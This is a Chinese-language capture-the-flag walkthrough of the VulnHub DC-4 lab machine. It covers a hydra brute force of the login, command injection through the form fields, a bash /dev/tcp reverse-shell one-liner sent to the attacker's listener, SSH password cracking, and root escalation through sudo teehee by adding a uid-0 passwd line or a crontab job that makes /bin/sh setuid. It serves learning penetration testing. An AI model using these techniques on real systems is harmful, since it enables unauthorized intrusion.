VulnHub靶机渗透之DC:4

这次的靶机为DC系列第四个靶机，这系列的靶机设计的很不错，每个靶机环境都比较相似，但是每一个靶机都需要不同的技术和技巧，闲话不多说，下载地址：https://download.vulnhub.com/dc/DC-4.zip，感兴趣自行下载。

第一步依然是nmap扫描开放的端口，只有22和80两个。80端口为nginx的web服务。

打开网页，只有一个登陆界面，剩下的啥都没找到。

在exploitdb中没有找到可以直接利用的漏洞，随便试了几个密码，发现这个页面没有验证码和错误次数的限制，看来可以尝试爆破了。利用hydra对登陆密码进行爆破，得到了admin的密码为happy。

登陆后的页面中可以查看文件列表，磁盘利用率和剩余空间，通过结果来看明显是通过linux的命令得到的回显。查看页面源码，发现表单传递的就是ls -l,du -h和df -h这几个命令，这样就好办了，直接修改源码执行其他命令就可以获取到shell了。

先用id命令试一下，在浏览器开发者模式下修改页面元素，直接提交，可以看到页面返回了uid信息，说明id命令执行成功。

接下在在本地利用nc监听5555端口，并修改页面中传递的命令为“/bin/bash -c 'bash -i >& /dev/tcp/192.168.x.x/5555 0>&1'”，通过以上命令将目标主机的shell反弹到本机的5555端口。

查看/etc/passwd，得知还有charles，jim和sam三个用户存在。

看来应该可以利用这三个用户其中的某一个通过ssh登录系统了。随后又在jim的目录下发现了一个old-password.bak的文件，从文件名来看肯定与密码有关了，全部copy到本地，作为字典暴力破解刚刚得到的三个用户。

通过上面得到了字典成功找到了jim的密码为jibril04，ssh登陆目标主机。

登陆后系统提示有一封邮件，

在var/mail下，找到了jim的邮件，内容中有charles的密码，话说这个密码还挺复杂。

利用charles登陆目标系统（直接切换用户也可以），在用户目录下没有什么发现，find查找拥有suid的文件，也没有收获。

通过sudo -l，发现这个用户可以在不需要密码的情况下执行/usr/bin/teehee这个文件。

看看这个文件的帮助，原来可以利用它来向其他文件写入内容，这样来看提权有望了。

利用teehee可以向其它文件以root身份写入内容，我们有两种方法得到root权限。

第一种：直接向/etc/passwd中增加内容

直接在/etc/passwd中增加一行，用户名为“wang”,uid和gid都为0，那么这个用户就相当说root。之后直接切换到wang这个用户，得到root权限。

第二种：通过定时任务执行脚本提权

向/etc/crontab文件中写入新的定时任务

时间部分全部填写为*，这样默认这个定时任务每分钟执行一次，可以根据情况自行设定。通过执行的脚本将/bin/sh的权限修改为4777，这样就可以在非root用户下执行它，并且执行期间拥有root权限。

通过ls -al可以看到/bin/sh的权限已经改变为“rws********”

直接执行/bin/sh，得到root权限。

在/root下找到flag